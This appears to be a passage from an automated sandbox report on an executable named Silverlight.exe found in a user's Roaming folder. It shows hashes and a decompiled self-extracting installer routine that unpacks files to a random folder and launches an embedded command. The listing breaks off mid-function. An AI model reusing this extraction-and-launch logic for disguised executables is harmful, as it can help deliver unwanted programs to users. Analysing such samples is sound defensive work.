Opcode Fuzzy Hash: be5a52660c0e3419c9ec3dd70b7333d40248d44ca4d1e59472e8ce635f5712e7
Instruction Fuzzy Hash: 4DC04C3268562231D51136156C03FCE554C0F46B14F65015AFA043B1D296F8664201EE

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Silverlight.exe PID: 2484 Parent PID: 528 Silverlight.exeCOMMON

Executed Functions

Function 01004B0F, Relevance: 156.8, APIs: 75, Strings: 14, Instructions: 1052
windowtimestringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E01004B0F(void* __ecx, void __edx, void __edi, char* __esi) {
				intOrPtr _t212;
				void* _t217;
				void _t219;
				char _t221;
				void _t224;
				intOrPtr _t225;
				void* _t226;
				signed int _t227;
				signed int _t228;
				intOrPtr _t229;
				void _t230;
				void* _t231;
				void* _t238;
				long _t239;
				void _t243;
				void _t247;
				struct HWND__* _t249;
				signed int _t251;
				long _t254;
				void* _t262;
				signed int _t265;
				void _t267;
				signed int _t268;
				void _t275;
				void* _t276;
				unsigned int _t277;
				signed int _t278;
				void* _t281;
				short _t282;
				void _t285;
				void* _t286;
				void _t295;
				void _t296;
				long _t297;
				void _t298;
				long _t306;
				intOrPtr _t311;
				void _t312;
				signed int _t316;
				void _t321;
				void* _t322;
				struct HWND__* _t327;
				void _t331;
				void _t356;
				struct HWND__* _t357;
				void _t361;
				void* _t363;
				void _t372;
				void* _t373;
				int _t374;
				void _t376;
				void _t377;
				int _t379;
				void _t386;
				void _t387;
				void _t389;
				void _t395;
				signed int _t397;
				signed int _t398;
				void _t400;
				void _t402;
				void _t404;
				void _t406;
				void _t408;
				void _t411;
				long _t416;
				void _t430;
				void _t431;
				void _t432;
				signed int _t434;
				void* _t439;
				int _t444;
				signed int _t456;
				void _t458;
				void* _t462;
				void* _t467;
				char* _t473;
				void* _t475;
				void* _t477;
				void _t481;
				void* _t482;
				void _t483;
				void* _t487;
				void* _t488;
				void* _t489;
				void* _t495;
				intOrPtr* _t496;
				void* _t497;
				void* _t499;
				void* _t501;
				void* _t503;

				_t473 = __esi;
				_t458 = __edi;
				_t455 = __edx;
				_t488 = _t495 - 0x52c;
				_t496 = _t495 - 0x5a8;
				_t212 =  *0x100a028; // 0xbb40e64e
				_t503 =  *0x100ad60; // 0x63
				 *((intOrPtr*)(_t488 + 0x528)) = _t212;
				 *(_t488 - 0x10) = 0x5c3a63;
				 *(_t488 - 0x11) = 0x63;
				 *(_t488 - 0x12) = 0x63;
				 *(_t488 - 0x24) = 0;
				 *(_t488 - 0x20) = 0;
				 *(_t488 - 0x40) = 0;
				 *(_t488 - 0x3c) = 0;
				 *(_t488 - 0x18) = 0;
				 *(_t488 - 0x28) = 0;
				 *(_t488 - 0x60) = 0xc;
				 *((intOrPtr*)(_t488 - 0x5c)) = _t488 + 0x514;
				 *((intOrPtr*)(_t488 - 0x58)) = 0;
				 *((intOrPtr*)(_t488 - 0x38)) = 0;
				if(_t503 == 0) {
					L3:
					_t217 = E010039E5(_t488 - 0x50, _t488 - 0x2c, _t488 - 0x34); // executed
					if(_t217 != 0) {
						_push(_t473);
						_push(_t458);
						_t219 = InitializeSecurityDescriptor(_t488 + 0x514, 1);
						__eflags = _t219;
						if(_t219 != 0) {
							_t402 = InitializeAcl(_t488 + 0x3f4, 0x100, 2);
							__eflags = _t402;
							if(_t402 != 0) {
								_t473 = AddAccessAllowedAce;
								_t458 = 0x10000000;
								_t404 = AddAccessAllowedAce(_t488 + 0x3f4, 2, 0x10000000,  *(_t488 - 0x50));
								__eflags = _t404;
								if(_t404 != 0) {
									_t406 = AddAccessAllowedAce(_t488 + 0x3f4, 2, 0x10000000,  *(_t488 - 0x2c));
									__eflags = _t406;
									if(_t406 != 0) {
										_t408 = AddAccessAllowedAce(_t488 + 0x3f4, 2, 0x10000000,  *(_t488 - 0x34));
										__eflags = _t408;
										if(_t408 != 0) {
											_t411 = SetSecurityDescriptorDacl(_t488 + 0x514, 1, _t488 + 0x3f4, 0);
											__eflags = _t411;
											if(_t411 != 0) {
												 *((intOrPtr*)(_t488 - 0x38)) = _t488 - 0x60;
											}
										}
									}
								}
							}
						}
						__eflags =  *0x101b0c0;
						if( *0x101b0c0 != 0) {
							L15:
							GetSystemDirectoryA(0x100b0c0, 0xffff);
							 *(_t488 - 0x30) =  *(_t488 - 0x30) & 0x00000000;
							 *(_t488 - 0x2c) =  *(_t488 - 0x2c) & 0x00000000;
							_t416 =  *0x100b0c0 | 0x00000020;
							__eflags = _t416;
							_t221 = E01002838();
							_t422 = 0x61;
							 *((char*)(_t488 - 0x19)) = _t221;
							 *(_t488 - 0x10) = 0x61;
							do {
								__eflags = _t422 -  *((intOrPtr*)(_t488 - 0x19));
								if(_t422 !=  *((intOrPtr*)(_t488 - 0x19))) {
									 *((char*)(_t488 - 0xe)) = 0;
									_t224 = QueryDosDeviceA(_t488 - 0x10, _t488 - 0xc, 0x400); // executed
									__eflags = _t224;
									 *((char*)(_t488 - 0xe)) = 0x5c;
									if(_t224 == 0) {
										L34:
										_t422 =  *(_t488 - 0x10);
									} else {
										_strlwr(_t488 - 0xc);
										 *_t496 = "harddisk";
										_t386 = strstr(_t488 - 0xc, ??);
										__eflags = _t386;
										if(_t386 != 0) {
											L20:
											_t387 = E01002955( *(_t488 - 0x10)); // executed
											_t458 = _t387;
											__eflags = _t458;
											if(_t458 == 0) {
												goto L34;
											} else {
												_push(_t488 - 0x10);
												_t389 = E01002769();
												__eflags = _t389;
												if(_t389 == 0) {
													goto L34;
												} else {
													_t395 = GetDiskFreeSpaceA(_t488 - 0x10, _t488 - 0x48, _t488 - 0x54, _t488 - 0x4c, _t488 - 0x6c); // executed
													__eflags = _t395;
													if(_t395 == 0) {
														goto L34;
													} else {
														_t397 =  *(_t488 - 0x48) *  *(_t488 - 0x54);
														_t455 = _t397 *  *(_t488 - 0x4c) >> 0x20;
														_t398 = _t397 *  *(_t488 - 0x4c);
														_t422 =  *(_t488 - 0x10);
														__eflags = _t422 - _t416;
														 *(_t488 - 0x28) = 1;
														_t487 = _t397 *  *(_t488 - 0x4c) >> 0x20;
														if(_t422 != _t416) {
															__eflags = _t458 - 2;
															if(_t458 != 2) {
																L30:
																__eflags = _t487 -  *(_t488 - 0x20);
																if(__eflags >= 0) {
																	if(__eflags > 0) {
																		L33:
																		 *(_t488 - 0x24) = _t398;
																		 *(_t488 - 0x20) = _t487;
																		 *(_t488 - 0x11) = _t422;
																	} else {
																		__eflags = _t398 -  *(_t488 - 0x24);
																		if(_t398 >  *(_t488 - 0x24)) {
																			goto L33;
																		}
																	}
																}
															} else {
																__eflags = _t487 -  *(_t488 - 0x3c);
																if(__eflags < 0) {
																	goto L30;
																} else {
																	if(__eflags > 0) {
																		L29:
																		 *(_t488 - 0x40) = _t398;
																		 *(_t488 - 0x3c) = _t487;
																		 *(_t488 - 0x12) = _t422;
																	} else {
																		__eflags = _t398 -  *(_t488 - 0x40);
																		if(_t398 <=  *(_t488 - 0x40)) {
																			goto L30;
																		} else {
																			goto L29;
																		}
																	}
																}
															}
														} else {
															 *(_t488 - 0x30) = _t398;
															 *(_t488 - 0x2c) = _t487;
														}
													}
												}
											}
										} else {
											_t400 = strstr(_t488 - 0xc, "ramdisk");
											__eflags = _t400;
											if(_t400 == 0) {
												goto L34;
											} else {
												goto L20;
											}
										}
									}
								}
								_t422 =  &(_t422[0]);
								__eflags = _t422 - 0x7a;
								 *(_t488 - 0x10) = _t422;
							} while (_t422 <= 0x7a);
							_t473 = 0;
							__eflags =  *(_t488 - 0x28);
							if( *(_t488 - 0x28) != 0) {
								_t225 =  *0x100a020; // 0xcab00eee
								__eflags = _t225 - 0xcab00eee;
								if(_t225 == 0xcab00eee) {
									L42:
									_t226 =  *(_t488 - 0x2c);
									__eflags =  *(_t488 - 0x20) - _t226;
									if(__eflags > 0) {
										goto L46;
									} else {
										if(__eflags < 0) {
											L45:
											_t422 =  *(_t488 - 0x30);
											 *(_t488 - 0x20) = _t226;
										} else {
											__eflags =  *(_t488 - 0x24) -  *(_t488 - 0x30);
											if( *(_t488 - 0x24) >=  *(_t488 - 0x30)) {
												goto L46;
											} else {
												goto L45;
											}
										}
									}
								} else {
									__eflags =  *(_t488 - 0x20);
									if(__eflags > 0) {
										L46:
										_t416 =  *(_t488 - 0x11);
										_t422 =  *(_t488 - 0x24);
									} else {
										if(__eflags < 0) {
											goto L42;
										} else {
											__eflags =  *(_t488 - 0x24) - _t225;
											if( *(_t488 - 0x24) >= _t225) {
												goto L46;
											} else {
												goto L42;
											}
										}
									}
								}
								_t227 =  *0x100a018; // 0x6a64ac
								_t456 = 3;
								_t455 = _t227 * _t456 >> 0x20;
								_t228 = _t227 * _t456;
								__eflags =  *(_t488 - 0x20) - _t455;
								if(__eflags < 0) {
									L51:
									__eflags =  *(_t488 - 0x3c) - _t455;
									if(__eflags < 0) {
										L92:
										_push(0x20000009);
										goto L93;
									} else {
										if(__eflags > 0) {
											L54:
											 *(_t488 - 0x10) =  *(_t488 - 0x12);
											goto L55;
										} else {
											__eflags =  *(_t488 - 0x40) - _t228;
											if( *(_t488 - 0x40) < _t228) {
												goto L92;
											} else {
												goto L54;
											}
										}
									}
								} else {
									if(__eflags > 0) {
										L50:
										 *(_t488 - 0x10) = _t416;
										L55:
										_t361 = CryptAcquireContextA(_t488 - 0x44, _t473, _t473, 1, 0xf0000000); // executed
										__eflags = _t361;
										if(_t361 == 0) {
											L69:
											_t473 = 0x100ad60;
											_t363 = E010029FF(_t488 - 0x10, "temp\\ext", 0x100ad60);
											GetSystemTime(_t488 - 0x7c);
											SystemTimeToFileTime(_t488 - 0x7c, _t488 - 0x68);
											E01002AC7( *(_t488 - 0x68) *  *0x100a018 & 0x0000ffff, _t363);
											_t458 = 1;
											_t372 = E0100428F(1, 0x100ad60, 0x100ad60,  *((intOrPtr*)(_t488 - 0x38)), 1);
											__eflags = _t372;
											if(_t372 != 0) {
												 *(_t488 - 0x18) = 1;
												goto L72;
											} else {
												goto L70;
											}
										} else {
											_t458 = sprintf;
											 *(_t488 - 0x2c) = _t473;
											 *(_t488 - 0x28) = _t473;
											_t416 = 0x100ad60;
											do {
												_t376 = CryptGenRandom( *(_t488 - 0x44), 0x10, _t488 + 0x4f4);
												__eflags = _t376;
												if(_t376 != 0) {
													_t379 = sprintf(_t416, "%s", _t488 - 0x10);
													_t496 = _t496 + 0xc;
													_t473 = 0;
													_t422 = 9;
													__eflags = 0;
													 *(_t488 - 0x20) = 9;
													if(0 != 0) {
														_t106 = _t379 + 0x100ad60; // 0x355c3a63
														 *(_t488 - 0x34) = _t106;
														do {
															sprintf( *(_t488 - 0x34), "%02x",  *(_t488 +  &(_t473[0x4f4])) & 0x000000ff);
															 *(_t488 - 0x34) =  &(( *(_t488 - 0x34))[2]);
															_t496 = _t496 + 0xc;
															_t473 =  &(_t473[1]);
															__eflags = _t473 -  *(_t488 - 0x20);
														} while (_t473 <  *(_t488 - 0x20));
													}
												}
												__eflags =  *0x100ad60;
												if( *0x100ad60 == 0) {
													 *(_t488 - 0x2c) = 1;
												} else {
													_t473 = 1;
													_t377 = E0100428F(_t458, 1, _t416,  *((intOrPtr*)(_t488 - 0x38)), 1); // executed
													__eflags = _t377;
													if(_t377 != 0) {
														 *(_t488 - 0x18) = 1;
													}
												}
												 *(_t488 - 0x28) =  &(( *(_t488 - 0x28))[1]);
												__eflags =  *(_t488 - 0x18);
												if( *(_t488 - 0x18) == 0) {
													__eflags =  *(_t488 - 0x2c);
													if( *(_t488 - 0x2c) == 0) {
														goto L67;
													}
												}
												break;
												L67:
												__eflags =  *(_t488 - 0x28) - 0x2710;
											} while ( *(_t488 - 0x28) < 0x2710);
											_t372 = CryptReleaseContext( *(_t488 - 0x44), 0);
											__eflags =  *(_t488 - 0x18);
											if( *(_t488 - 0x18) != 0) {
												goto L72;
											} else {
												goto L69;
											}
										}
									} else {
										__eflags = _t422 - _t228;
										if(_t422 < _t228) {
											goto L51;
										} else {
											goto L50;
										}
									}
								}
							} else {
								_push(0x20000008);
								goto L93;
							}
						} else {
							__eflags =  *0x100a18c; // 0x0
							if(__eflags == 0) {
								goto L15;
							} else {
								_t372 = GetCurrentDirectoryA(0x104, "c:\5a70dbc53fcf0baade86ff");
								L72:
								_t416 = 0;
								__eflags =  *0x101b0c0;
								if( *0x101b0c0 != 0) {
									L89:
									__eflags =  *(_t488 - 0x18) - _t416;
									if( *(_t488 - 0x18) != _t416) {
										goto L86;
									} else {
										_t372 = E0100428F(_t458, _t473, "c:\5a70dbc53fcf0baade86ff",  *((intOrPtr*)(_t488 - 0x38)), 1);
										__eflags = _t372;
										if(_t372 != 0) {
											goto L86;
										} else {
											goto L70;
										}
									}
								} else {
									__eflags =  *0x100a18c - _t416; // 0x0
									if(__eflags == 0) {
										goto L89;
									} else {
										_t458 = 0x100ad60;
										while(1) {
											_t374 = DialogBoxParamA( *0x100a05c, 0x6b,  *0x100aae4, E01003B46, _t416);
											__eflags = _t374 - 0xffffffff;
											if(_t374 == 0xffffffff) {
												goto L4;
											}
											__eflags = _t374 - _t416;
											if(_t374 == _t416) {
												L88:
												_push(0x4c7);
												goto L93;
											} else {
												__eflags =  *_t374;
												if( *_t374 == 0) {
													goto L88;
												} else {
													_t444 = _t374;
													_t131 = _t444 + 1; // 0x1
													_t473 = _t131;
													do {
														_t455 =  *_t444;
														_t444 = _t444 + 1;
														__eflags = _t455;
													} while (_t455 != 0);
													_t422 = _t444 - _t473 + 1;
													__eflags = _t444 - _t473 + 1 - 0x104;
													if(_t444 - _t473 + 1 >= 0x104) {
														L70:
														_push(0x52);
														goto L93;
													} else {
														_t455 = _t458 - _t374;
														__eflags = _t455;
														do {
															_t422 =  *_t374;
															 *(_t455 + _t374) = _t422;
															_t374 = _t374 + 1;
															__eflags = _t422;
														} while (_t422 != 0);
														_t372 = E0100428F(_t458, _t473, _t458, _t416, _t416);
														__eflags = _t372;
														if(_t372 != 0) {
															 *(_t488 - 0x18) = 1;
														}
														__eflags =  *(_t488 - 0x18) - _t416;
														if( *(_t488 - 0x18) == _t416) {
															continue;
														} else {
															L86:
															goto L87;
														}
													}
												}
											}
											goto L201;
										}
										goto L4;
									}
								}
							}
						}
					} else {
						L4:
						_push(0xffffffff);
						L93:
						E010035C6();
						asm("int3");
						_push(_t488);
						_t489 = _t496 - 0x98;
						_t497 = _t496 - 0x118;
						_t229 =  *0x100a028; // 0xbb40e64e
						_push(_t416);
						 *((intOrPtr*)(_t489 + 0x94)) = _t229;
						_t230 =  *(_t489 + 0xa0);
						_push(_t473);
						_push(_t458);
						if(_t230 == 0) {
							L113:
							_t231 = 0;
							__eflags = 0;
						} else {
							if(_t230 == 2) {
								__eflags =  *0x100a18c; // 0x0
								if(__eflags != 0) {
									L115:
									_t475 =  *(_t489 + 0xa4);
									goto L116;
								} else {
									__eflags =  *0x100aae8; // 0x0
									if(__eflags != 0) {
										goto L115;
									} else {
										_t475 =  *(_t489 + 0xa4);
										_t230 = strstr( *(_t475 + 4), "cdtag.1");
										__eflags = _t230;
										_pop(_t422);
										if(_t230 == 0) {
											L116:
											__eflags =  *0x100a048; // 0x0
											if(__eflags != 0) {
												L122:
												__eflags =  *0x100a194; // 0x0
												if(__eflags == 0) {
													_t327 =  *0x100aae4; // 0x180176
													__eflags = _t327;
													if(_t327 == 0) {
														goto L100;
													}
													SendDlgItemMessageA(_t327, 0x68, 0xc, 0,  *(_t475 + 4)); // executed
												}
												E010029FF("c:\5a70dbc53fcf0baade86ff",  *(_t475 + 4), _t489 - 0x70);
												_push(_t489 - 0x70);
												 *(_t489 + 0xa0) = 1;
												 *0x100a080 = 0;
												E01004143(0x100a008);
												_t458 = CreateFileA;
												while(1) {
													_t238 = CreateFileA(_t489 - 0x70, 0x40000000, 3, 0, 2, 0x80, 0); // executed
													_t475 = _t238;
													__eflags = _t475 - 0xffffffff;
													if(_t475 != 0xffffffff) {
														break;
													}
													_t239 = GetLastError();
													__eflags = _t239 - 5;
													if(_t239 != 5) {
														L131:
														__eflags =  *(_t489 + 0xa0);
														if( *(_t489 + 0xa0) == 0) {
															goto L135;
														}
														 *(_t489 + 0xa0) = 0;
														E0100423B(_t489 - 0x70, 0, 0);
													} else {
														_t321 = E01004168(_t489 - 0x70, 0x100a080);
														__eflags = _t321;
														if(_t321 == 0) {
															goto L131;
														} else {
															_t322 = 0;
															__eflags = 0;
															do {
																_t171 = _t322 + 0x100a080; // 0x0
																_t422 =  *_t171;
																 *(_t489 + _t322 - 0x70) = _t422;
																_t322 = _t322 + 1;
																__eflags = _t422;
															} while (_t422 != 0);
														}
													}
												}
												SetFilePointer(_t475,  *( *(_t489 + 0xa4)), 0, 0); // executed
												SetEndOfFile(_t475); // executed
												SetFilePointer(_t475, 0, 0, 0); // executed
												 *0x100a184 = _t475;
												_t231 = _t475;
											} else {
												__eflags =  *0x100a004; // 0x1
												if(__eflags == 0) {
													goto L122;
												} else {
													__imp___stricmp( *(_t475 + 4), "_sfx_manifest_");
													__eflags = _t230;
													_pop(_t422);
													if(_t230 != 0) {
														goto L122;
													} else {
														 *0x100a050 =  *_t475;
														_t331 = E010038EC( *_t475 + 1);
														__eflags = _t331;
														_pop(_t422);
														 *0x100a04c = _t331;
														if(_t331 == 0) {
															_push(8);
															goto L136;
														}
														 *0x100ad28 = _t331;
														 *0x100a048 = 1;
														 *_t331 = 0;
														_t231 = 0xdadafeed;
													}
												}
											}
										} else {
											goto L113;
										}
									}
								}
							} else {
								if(_t230 != 3) {
									goto L113;
								} else {
									_t475 =  *(_t489 + 0xa4);
									if( *(_t475 + 0x14) != 0xdadafeed) {
										DosDateTimeToFileTime(0, 0, _t489 - 0x80);
										LocalFileTimeToFileTime(_t489 - 0x80, _t489 - 0x78);
										SetFileTime( *(_t475 + 0x14), _t489 - 0x78, _t489 - 0x78, _t489 - 0x78); // executed
										FindCloseChangeNotification( *(_t475 + 0x14));
										__eflags =  *0x100a194; // 0x0
										 *0x100a184 = 0;
										if(__eflags == 0) {
											_t357 =  *0x100aae4; // 0x180176
											__eflags = _t357;
											if(_t357 == 0) {
												L100:
												_push(0x4c7);
												L136:
												E010035C6();
												asm("int3");
												_t499 = _t497 - 0x84;
												 *0x100ad24 =  *0x100ad24 | 0xffffffff;
												_t460 = 0x80000000;
												 *(_t499 + 0x18) = 0;
												 *0x100a9e0 = 0;
												 *0x100a5a8 = 0x80000000;
												InitializeCriticalSectionAndSpinCount(0x100ad40, 0xffffffff);
												 *0x100a060 = 1;
												__imp__#17(_t458, _t475, _t489, 0);
												 *0x100ad58 = GetProcessHeap();
												E01002DAC();
												_t243 = CreateEventA(0, 1, 0, 0);
												__eflags = _t243;
												 *0x100ac04 = _t243;
												if(_t243 != 0) {
													E01003CDC();
													__eflags =  *0x100a054; // 0x0
													if(__eflags != 0) {
														L145:
														 *0x100ac0c = CreateEventA(0, 0, 0, 0);
														_t247 = CreateThread(0, 0, E0100366E, 0, 0, _t499 + 0x18); // executed
														__eflags = _t247;
														if(_t247 != 0) {
															WaitForSingleObject( *0x100ac0c, 0xffffffff);
															_t249 =  *0x100aae4; // 0x180176
															__eflags = _t249;
															if(_t249 != 0) {
																__eflags =  *0x100a194; // 0x0
																_t477 = SendDlgItemMessageA;
																if(__eflags == 0) {
																	SendDlgItemMessageA(_t249, 0x68, 0xc, 0,  *0x100a190);
																	_t251 =  *0x100a018; // 0x6a64ac
																	_t254 = _t251 + 0xffff >> 0x10 << 0x10;
																	__eflags = _t254;
																	SendDlgItemMessageA( *0x100aae4, 0x6a, 0x401, 0, _t254); // executed
																	SendDlgItemMessageA( *0x100aae4, 0x6a, 0x404, 1, 0);
																} else {
																	Sleep(0x1f4);
																	ShowWindow( *0x100aae4, 0);
																	SetParent( *0x100aae4,  *0x100ac08);
																}
																__eflags =  *0x100a054; // 0x0
																if(__eflags != 0) {
																	L156:
																	E01004B0F(_t422, _t455, _t460, _t477);
																	__eflags =  *0x100a054; // 0x0
																	if(__eflags != 0) {
																		L163:
																		E010029FF("c:\5a70dbc53fcf0baade86ff", "_sfx_manifest_", 0x100ae80);
																		_t460 = CreateFileA(0x100ae80, 0x80000000, 1, 0, 3, 0x8000000, 0);
																		__eflags = _t460 - 0xffffffff;
																		if(_t460 == 0xffffffff) {
																			goto L141;
																		}
																		 *0x100a050 = GetFileSize(_t460, 0);
																		_t262 = E010038EC(_t260 + 1);
																		__eflags = _t262;
																		_pop(_t422);
																		 *0x100a04c = _t262;
																		if(_t262 != 0) {
																			_t422 = _t499 + 0x18;
																			_t296 = ReadFile(_t460, _t262,  *0x100a050, _t499 + 0x18, 0);
																			__eflags = _t296;
																			if(_t296 != 0) {
																				_t297 =  *0x100a050; // 0x0
																				__eflags =  *((intOrPtr*)(_t499 + 0x14)) - _t297;
																				if( *((intOrPtr*)(_t499 + 0x14)) == _t297) {
																					_t422 =  *0x100a04c; // 0x0
																					 *0x100a048 = 1;
																					 *((char*)(_t422 + _t297)) = 0;
																				}
																			}
																		}
																		CloseHandle(_t460);
																		__eflags =  *0x100a048; // 0x0
																		if(__eflags == 0) {
																			goto L141;
																		} else {
																			DeleteFileA(0x100ae80);
																			L170:
																			__eflags =  *0x100a048; // 0x0
																			if(__eflags == 0) {
																				L173:
																				__eflags =  *0x100ad5c; // 0x499c78
																				if(__eflags == 0) {
																					L189:
																					__eflags =  *0x101b0c0;
																					if( *0x101b0c0 == 0) {
																						ShowWindow( *0x100aae4, 0);
																						LoadStringA( *0x100a05c, 0x20000002, 0x100ae80, 0x104);
																						MessageBoxA( *0x100aae4, 0x100ae80, 0x100ae80, 0x10030);
																					}
																					L191:
																					_t265 =  *0x100a5a8; // 0xc0000013
																					__eflags = _t265;
																					if(_t265 < 0) {
																						goto L198;
																					}
																					__eflags = 0x40000000 & _t265;
																					if(__eflags != 0) {
																						L196:
																						_push(0x20000007);
																						goto L197;
																					}
																					_push( *0x100a5ac);
																					_push(0x100a5b0);
																					_push(_t265 >> 0x00000004 & 0x00000001);
																					_push(_t265 >> 0x00000001 & 0x00000001);
																					_push(_t265 & 0x00000001);
																					_t267 = E0100369A(_t455, _t460, __eflags);
																					__eflags = _t267;
																					_t268 =  *0x100a5a8; // 0xc0000013
																					if(_t267 == 0) {
																						_t268 = _t268 | 0x40000000;
																						__eflags = _t268;
																						 *0x100a5a8 = _t268;
																					}
																					__eflags = 0x40000000 & _t268;
																					if((0x40000000 & _t268) == 0) {
																						goto L198;
																					} else {
																						goto L196;
																					}
																				}
																				__eflags =  *0x100a18c; // 0x0
																				if(__eflags != 0) {
																					goto L189;
																				}
																				__eflags =  *0x100a194; // 0x0
																				if(__eflags == 0) {
																					SendDlgItemMessageA( *0x100aae4, 0x68, 0xc, 0,  *0x100aaec);
																				}
																				SetEnvironmentVariableA("_SFX_CAB_EXE_PATH", "c:\5a70dbc53fcf0baade86ff");
																				SetEnvironmentVariableA("_SFX_CAB_EXE_PACKAGE", "C:\Users\hardz\AppData\Roaming\Silverlight.exe");
																				E010034F8();
																				_t275 =  *0x100ad5c; // 0x499c78
																				_t481 = 0x100ae80 - _t275;
																				__eflags = _t481;
																				do {
																					_t430 =  *_t275;
																					 *((char*)(_t481 + _t275)) = _t430;
																					_t275 = _t275 + 1;
																					__eflags = _t430;
																				} while (_t430 != 0);
																				_t276 =  *0x100a188; // 0x46330e
																				_t482 = _t276;
																				do {
																					_t431 =  *_t276;
																					_t276 = _t276 + 1;
																					__eflags = _t431;
																				} while (_t431 != 0);
																				_t277 = _t276 - _t482;
																				_t462 = 0x100ae7f;
																				__eflags = 0x100ae7f;
																				do {
																					_t432 =  *(_t462 + 1);
																					_t462 = _t462 + 1;
																					__eflags = _t432;
																				} while (_t432 != 0);
																				_t434 = _t277 >> 2;
																				_t278 = memcpy(_t462, _t482, _t434 << 2);
																				memcpy(_t482 + _t434 + _t434, _t482, _t278 & 0x00000003);
																				_t501 = _t499 + 0x18;
																				_t439 = 0x11;
																				_t467 = _t501 + 0x50;
																				_t281 = memset(_t467, 0, 0 << 2);
																				_t499 = _t501 + 0xc;
																				_t460 = _t467 + _t439;
																				_t282 = _t281 + 1;
																				 *((intOrPtr*)(_t499 + 0x7c)) = _t282;
																				 *((short*)(_t499 + 0x80)) = _t282;
																				 *((intOrPtr*)(_t499 + 0x5c)) = 0x44;
																				_t285 = CreateProcessA(0, 0x100ae80, 0, 0, 0, 0x20, 0,  *0x101b0c4, _t499 + 0x54, _t499 + 0x1c); // executed
																				__eflags = _t285;
																				if(_t285 == 0) {
																					goto L138;
																				}
																				__eflags =  *0x100a194; // 0x0
																				if(__eflags == 0) {
																					ShowWindow( *0x100aae4, 0);
																				}
																				_t286 =  *(_t499 + 0x1c);
																				 *0x100ad2c = _t286;
																				WaitForSingleObject(_t286, 0xffffffff);
																				GetExitCodeProcess( *(_t499 + 0x20), _t499 + 0x10); // executed
																				CloseHandle( *(_t499 + 0x20)); // executed
																				E010026B8(0); // executed
																				__eflags =  *(_t499 + 0x10) - 0xcabf00d1;
																				if( *(_t499 + 0x10) != 0xcabf00d1) {
																					E01002B8A();
																				} else {
																					 *(_t499 + 0x10) = 0;
																				}
																				goto L191;
																			}
																			__eflags =  *0x100a004; // 0x1
																			if(__eflags == 0) {
																				goto L173;
																			}
																			_push( *0x100a04c);
																			_t295 = E01004353(_t422);
																			__eflags = _t295;
																			if(_t295 == 0) {
																				goto L141;
																			}
																			goto L173;
																		}
																	}
																	__eflags =  *0x100a194; // 0x0
																	if(__eflags == 0) {
																		LoadStringA( *0x100a05c, 0x20000004, 0x100ae80, 0x104);
																		_t460 = 0x100a8c0;
																		LoadStringA( *0x100a05c, 0x20000006, 0x100a8c0, 0x104);
																		SendDlgItemMessageA( *0x100aae4, 0x65, 0xc, 0, 0x100ae80); // executed
																		SendDlgItemMessageA( *0x100aae4, 0x66, 0xc, 0, 0x100a8c0); // executed
																		SendDlgItemMessageA( *0x100aae4, 0x69, 0xc, 0, "c:\5a70dbc53fcf0baade86ff"); // executed
																		SendDlgItemMessageA( *0x100aae4, 0x6a, 0x402, 0, 0); // executed
																		_t306 = ( *(_t499 + 0x3e) & 0x0000ffff) << 0x10;
																		__eflags = _t306;
																		SendDlgItemMessageA( *0x100aae4, 0x6a, 0x401, 0, _t306); // executed
																		ShowWindow( *0x100aae4, 5); // executed
																	}
																	_t298 = E01006D0F(__eflags,  *((intOrPtr*)(_t499 + 0x2c)), "C:\Users\hardz\AppData\Roaming\Silverlight.exe", L"", 0, 0x1005019, 0, 0); // executed
																	_t499 = _t499 + 0x1c;
																	__eflags = _t298;
																	if(_t298 == 0) {
																		goto L141;
																	} else {
																		__eflags =  *0x101b0c0;
																		if( *0x101b0c0 != 0) {
																			L162:
																			__eflags =  *0x100a054; // 0x0
																			if(__eflags == 0) {
																				goto L170;
																			}
																			goto L163;
																		}
																		__eflags =  *0x100aae4; // 0x180176
																		if(__eflags == 0) {
																			goto L148;
																		}
																		goto L162;
																	}
																} else {
																	_push(0);
																	_push(0);
																	_t460 = E0100390A("C:\Users\hardz\AppData\Roaming\Silverlight.exe");
																	_t311 = E01005D7F(E010038EC, E01002A62, E0100390A, E01003949, E01003971, E01002A75, E01002A9C, 0, _t499 + 0x38);
																	_t422 = _t499 + 0x68;
																	 *((intOrPtr*)(_t499 + 0x50)) = _t311;
																	_t312 = E01005E0F(_t311, _t309, _t499 + 0x68); // executed
																	_t499 = _t499 + 0x3c;
																	__eflags = _t312;
																	if(_t312 == 0) {
																		L141:
																		_push(0x20000001);
																		goto L197;
																	}
																	__eflags =  *0x100a194; // 0x0
																	if(__eflags == 0) {
																		ShowWindow( *0x100aae4, 0); // executed
																	}
																	goto L156;
																}
															}
															L148:
															_push(0x4c7);
															goto L197;
														}
														_push(8);
														goto L197;
													}
													_t316 =  *0x100a01c; // 0x8800
													__eflags = (_t316 & 0xffff0000) - 0xcab00000;
													if((_t316 & 0xffff0000) != 0xcab00000) {
														__eflags =  *0x100a01c & 0x80000000;
														if(( *0x100a01c & 0x80000000) == 0) {
															 *0x100a18c = 1;
														}
														 *0x100a01f =  *0x100a01f & 0x0000007f;
														__eflags =  *0x100a01f;
														goto L145;
													}
													goto L141;
												} else {
													L138:
													_push(0xffffffff);
													L197:
													E010035C6();
													L198:
													__eflags =  *0x100a060; // 0x0
													if(__eflags != 0) {
														DeleteCriticalSection(0x100ad40);
														 *0x100a060 = 0;
													}
													ExitProcess( *(_t499 + 0x10));
												}
											}
											SendDlgItemMessageA(_t357, 0x6a, 0x405, 0, 0);
										}
										__eflags =  *0x100a080; // 0x0
										_t458 = 0x100ad60;
										if(__eflags != 0) {
											E010029FF(0x100ad60,  *(_t475 + 4), _t489 - 0x70);
											_t356 = MoveFileExA(0x100a080, _t489 - 0x70, 1);
											__eflags = _t356;
											if(_t356 == 0) {
												L135:
												_push(0xffffffff);
												goto L136;
											}
										}
										__eflags =  *_t475;
										if( *_t475 != 0) {
											 *0x100aaec = E01003B0F( *(_t475 + 4));
											_t483 = E010029FF(_t458,  *(_t475 + 4), _t489 - 0x70);
											while(1) {
												__eflags = _t483 - _t489 - 0x70;
												if(_t483 <= _t489 - 0x70) {
													break;
												}
												__eflags =  *_t483 - 0x5c;
												if( *_t483 != 0x5c) {
													_t483 = _t483 - 1;
													__eflags = _t483;
													continue;
												}
												break;
											}
											 *0x100ad5c = E01003B0F(_t489 - 0x70);
											 *_t483 = 0;
											 *0x101b0c4 = E01003B0F(_t489 - 0x70);
										}
									}
									_t231 = 1;
								}
							}
						}
						return E01005C72(_t231,  *((intOrPtr*)(_t489 + 0x94)));
					}
				} else {
					_t372 = E0100428F(__edi, __esi, "c:\5a70dbc53fcf0baade86ff", 0, 0);
					if(_t372 != 0) {
						L87:
